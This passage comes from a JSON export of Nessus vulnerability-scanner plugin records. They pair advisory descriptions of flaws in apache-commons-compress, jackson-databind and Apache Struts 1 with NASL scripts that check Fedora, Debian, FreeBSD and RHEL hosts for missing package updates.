script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:apache-commons-compress\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"apache-commons-compress-1.17-3.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-compress\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:16", "description": "Fix for CVE-2018-11771\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : apache-commons-compress (2018-d29be920dc)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11771"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:apache-commons-compress", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-D29BE920DC.NASL", "href": "https://www.tenable.com/plugins/nessus/120816", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-d29be920dc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120816);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-11771\");\n script_xref(name:\"FEDORA\", value:\"2018-d29be920dc\");\n\n script_name(english:\"Fedora 28 : apache-commons-compress (2018-d29be920dc)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2018-11771\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-d29be920dc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache-commons-compress package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:apache-commons-compress\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"apache-commons-compress-1.16.1-2.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-compress\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-08-19T12:22:39", "description": "A Polymorphic Typing issue was discovered in jackson-databind, a JSON library for Java. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint, the service has the mysql-connector-java jar (8.0.14 or earlier) in the classpath, and an attacker can host a crafted MySQL server reachable by the victim, an attacker can send a crafted JSON message that allows them to read arbitrary local files on the server. This occurs because of missing com.mysql.cj.jdbc.admin.MiniAdmin validation.\n\nFor Debian 8 'Jessie', this problem has been fixed in version 2.4.2-2+deb8u6.\n\nWe recommend that you upgrade your jackson-databind packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-05-22T00:00:00", "type": "nessus", "title": "Debian DLA-1798-1 : jackson-databind security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-12086"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libjackson2-databind-java", "p-cpe:/a:debian:debian_linux:libjackson2-databind-java-doc", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DLA-1798.NASL", "href": "https://www.tenable.com/plugins/nessus/125317", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1798-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125317);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2019-12086\");\n\n script_name(english:\"Debian DLA-1798-1 : jackson-databind security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A Polymorphic Typing issue was discovered in jackson-databind, a JSON\nlibrary for Java. When Default Typing is enabled (either globally or\nfor a specific property) for an externally exposed JSON endpoint, the\nservice has the mysql-connector-java jar (8.0.14 or earlier) in the\nclasspath, and an attacker can host a crafted MySQL server reachable\nby the victim, an attacker can send a crafted JSON message that allows\nthem to read arbitrary local files on the server. This occurs because\nof missing com.mysql.cj.jdbc.admin.MiniAdmin validation.\n\nFor Debian 8 'Jessie', this problem has been fixed in version\n2.4.2-2+deb8u6.\n\nWe recommend that you upgrade your jackson-databind packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2019/05/msg00030.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/jackson-databind\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libjackson2-databind-java\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libjackson2-databind-java-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"libjackson2-databind-java\", reference:\"2.4.2-2+deb8u6\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libjackson2-databind-java-doc\", reference:\"2.4.2-2+deb8u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-18T15:23:46", "description": "Payara Releases reports :\n\nThe following is a list of tracked Common Vulnerabilities and Exposures that have been reported and analyzed, which can or have impacted Payara Server across releases :\n\n- CVE-2019-12086 A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9", "cvss3": {}, "published": "2020-10-09T00:00:00", "type": "nessus", "title": "FreeBSD : Payara -- A Polymorphic Typing issue in FasterXML jackson-databind (bd159669-0808-11eb-a3a4-0019dbb15b3f)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-12086"], "modified": "2020-10-13T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:payara", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_BD159669080811EBA3A40019DBB15B3F.NASL", "href": "https://www.tenable.com/plugins/nessus/141322", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141322);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/13\");\n\n script_cve_id(\"CVE-2019-12086\");\n\n script_name(english:\"FreeBSD : Payara -- A Polymorphic Typing issue in FasterXML jackson-databind (bd159669-0808-11eb-a3a4-0019dbb15b3f)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Payara Releases reports :\n\nThe following is a list of tracked Common Vulnerabilities and\nExposures that have been reported and analyzed, which can or have\nimpacted Payara Server across releases :\n\n- CVE-2019-12086 A Polymorphic Typing issue was discovered in\nFasterXML jackson-databind 2.x before 2.9.9\"\n );\n # https://docs.payara.fish/community/docs/5.193/security/security-fix-list.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ddab38c6\"\n );\n # https://vuxml.freebsd.org/freebsd/bd159669-0808-11eb-a3a4-0019dbb15b3f.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?05f3482e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:payara\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"payara<5.193\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:50", "description": "Updated struts packages that fix one security issue are now available for Red Hat Network Satellite 5.4 and 5.5, and Red Hat Satellite 5.6.\n\nThe Red Hat Security Response Team has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nRed Hat Satellite is a systems management tool for Linux-based infrastructures. It allows for provisioning, monitoring, and remote management of multiple Linux deployments with a single, centralized tool.\n\nApache Struts is a framework for building web applications with Java.\n\nIt was found that the Struts 1 ActionForm object allowed access to the 'class' parameter, which is directly mapped to the getClass() method.\nA remote attacker could use this flaw to manipulate the ClassLoader used by an application server running Struts 1. This could lead to remote code execution under certain conditions. (CVE-2014-0114)\n\nAll Satellite users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. For this update to take effect, the tomcat6 service must be restarted ('service tomcat6 restart').", "cvss3": {}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 6 : struts (RHSA-2014:0500)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:struts", "p-cpe:/a:redhat:enterprise_linux:struts-core", "p-cpe:/a:redhat:enterprise_linux:struts-extras", "p-cpe:/a:redhat:enterprise_linux:struts-taglib", "p-cpe:/a:redhat:enterprise_linux:struts-tiles", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2014-0500.NASL", "href": "https://www.tenable.com/plugins/nessus/79018", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0500. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79018);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0114\");\n script_bugtraq_id(67121);\n script_xref(name:\"RHSA\", value:\"2014:0500\");\n\n script_name(english:\"RHEL 6 : struts (RHSA-2014:0500)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated struts packages that fix one security issue are now available\nfor Red Hat Network Satellite 5.4 and 5.5, and Red Hat Satellite 5.6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nRed Hat Satellite is a systems management tool for Linux-based\ninfrastructures. It allows for provisioning, monitoring, and remote\nmanagement of multiple Linux deployments with a single, centralized\ntool.\n\nApache Struts is a framework for building web applications with Java.\n\nIt was found that the Struts 1 ActionForm object allowed access to the\n'class' parameter, which is directly mapped to the getClass() method.\nA remote attacker could use this flaw to manipulate the ClassLoader\nused by an application server running Struts 1. This could lead to\nremote code execution under certain conditions. (CVE-2014-0114)\n\nAll Satellite users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For this\nupdate to take effect, the tomcat6 service must be restarted ('service\ntomcat6 restart').\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0500\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0114\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:struts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:struts-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:struts-extras\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:struts-taglib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:struts-tiles\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0500\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"struts-1.3.10-6.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"struts-core-1.3.10-6.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"struts-extras-1.3.10-6.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"struts-taglib-1.3.10-6.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"struts-tiles-1.3.10-6.ep5.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"struts / struts-core / struts-extras / struts-taglib / struts-tiles\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:14:55", "description": "It was discovered that missing access checks in the Struts ActionForm object could result in the execution of arbitrary code. This update fixes this problem.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-03-26T00:00:00", "type": "nessus", "title": "Debian DLA-57-1 : libstruts1.2-java security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libstruts1.2-java", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DLA-57.NASL", "href": "https://www.tenable.com/plugins/nessus/82203", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-57-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82203);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0114\");\n script_bugtraq_id(67121);\n\n script_name(english:\"Debian DLA-57-1 : libstruts1.2-java security update\");\n script_summary(english:\"Checks dpkg output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that missing access checks in the Struts ActionForm\nobject could result in the execution of arbitrary code. This update\nfixes this problem.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2014/09/msg00014.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/libstruts1.2-java\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected libstruts1.2-java 